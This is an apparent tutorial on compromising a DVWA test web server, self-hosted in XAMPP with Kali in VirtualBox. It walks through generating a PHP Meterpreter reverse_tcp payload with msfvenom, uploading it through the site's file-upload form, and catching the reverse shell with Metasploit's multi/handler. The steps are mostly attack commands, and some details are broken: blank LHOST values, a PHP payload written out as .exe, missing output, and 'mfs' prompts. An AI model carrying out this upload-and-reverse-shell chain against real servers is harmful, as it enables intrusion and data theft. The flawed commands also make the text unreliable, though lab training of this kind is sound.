Exploiting a Web Server - Using msfvenom generated PHP Web Payload

 Exploiting a Web Server - Using msfvenom generated PHP Web Payload 

This exploit uses some of the file upload functions of the DVWA web site to demonstrate how to hack through the site itself. A hacker would use this type of vulnerability to gain access to web applications, servers, and data.

We will start by creating a pre-prepared PHP code that we will upload to the web server through the upload functionality provide by DVWA. 

For this exercise, I hosted DVWA application in XAMPP on my host operating system. I will generate PHP code using msfvenom on Kali Linux which is hosted/run on oracle VBOX.

On the Kali Linux, run the following command to generate PHP Web Payload:

$ msfvenom -p php/meterpreter/reverse_tcp LHOST=<Local IP>  LPORT=<Local Port>  -f raw > phpshell.php

For example,

$ msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > phpshell.exe

Here, is a IP Address of Kali Server

It will generate following php code:

Open a Web Browser (in Kali) and go to http://localhost/DVWA-master/login.php

Log in with admin as username and password as password 

Choose the Upload menu on the lower left

Click Choose File and select the phpshell.php file we just created on the Desktop and click Upload

The file is then posted to the server and the location is displayed for you as a means of confirmation. You can copy this and paste it at the end of the URL in the browser.

In the browser, visit that file’s location:

This will actually fail and you should see a “no socket” message, but we’ll set that up next.

Back to the Kali ssh session we will set up the server to connect to from the web server.

If you’re not within msfconsole anymore, start it: 

$ msfconsole

Now we want to choose an exploit to run.

msf> use exploit/multi/handler

msf> (exploit/multi/handler): 

This selects the exploit we’ll run in Metasploit

msf > set payload php/meterpreter/reverse_tcp

To see the options for this payload, type:

msf > show options 

Set the options as follows:

mfs > set LHOST 
mfs > set LPORT 4444

These options are the ‘local’ listening IP and port for the exploit. 

Return to your web browser on the Windows PC and refresh the page.

Now we can start the server:

mfs > exploit

Exploit is the fun command… here we are running the exploit we want to see. You can also use run but exploit is so much more Hacker. After a few seconds, you should see:

And then a moment or two later we get meterpreter shell:

meterpreter >

Let’s examine the web server so see what we can find. In the Meterpreter shell type:

meterpreter > dir

You can perform or run any command of targeted OS on meterpreter shell.

To see a list of the commands that are available to you, you can type help command at any time, when you’re finished type exit and the Meterpreter shell will close. 


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